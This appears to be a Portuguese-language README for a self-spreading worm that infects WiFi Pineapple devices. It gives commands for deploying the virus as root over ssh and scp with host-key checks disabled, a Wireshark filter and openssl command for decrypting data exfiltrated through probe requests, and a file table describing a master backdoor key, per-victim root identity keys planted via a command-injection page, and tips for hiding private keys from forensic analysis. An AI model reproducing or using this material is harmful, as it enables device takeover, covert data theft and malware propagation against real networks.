
Um worm que infecta WiFi Pineapple.
./build.sh
ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
Nota: Você precisará ter um dispositivo configurado OU usar o módulo metasploit para habilitar ssh
o filtro do wireshark é:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem
Opcionalmente, use o script harvest.py da seguinte forma:
python harvest.py [monitor-iface]
| Arquivo | Finalidade |
|---|
| tv | O próprio vírus. |
| tvbd | A chave de backdoor "mestre"; não distribua a chave privada. |
| tvd | A chave de divulgação, usada para exfiltrar dados via requisições de sonda (probe requests). |
| tospo_rsa | A chave privada de identidade, específica de cada dispositivo infectado, usada como chave de transferência. |
| tospo_rsa.pub | A chave pública de identidade, transferida via página de injeção de comandos para permitir que a identidade privada execute ações como root no dispositivo remoto. |
| w | Opções de configuração sem fio enviadas, usadas para restaurar conexões anteriores. |
| n | Opções de configuração de rede enviadas, usadas para restaurar conexões anteriores. |
| Nota: Todos os arquivos que começam com 'tv' são transferidos ao infectar um novo dispositivo. Não adicione chaves privadas ou similares usando nomes que comecem com 'tv'; caso contrário, sua chave privada será exposta à análise forense. |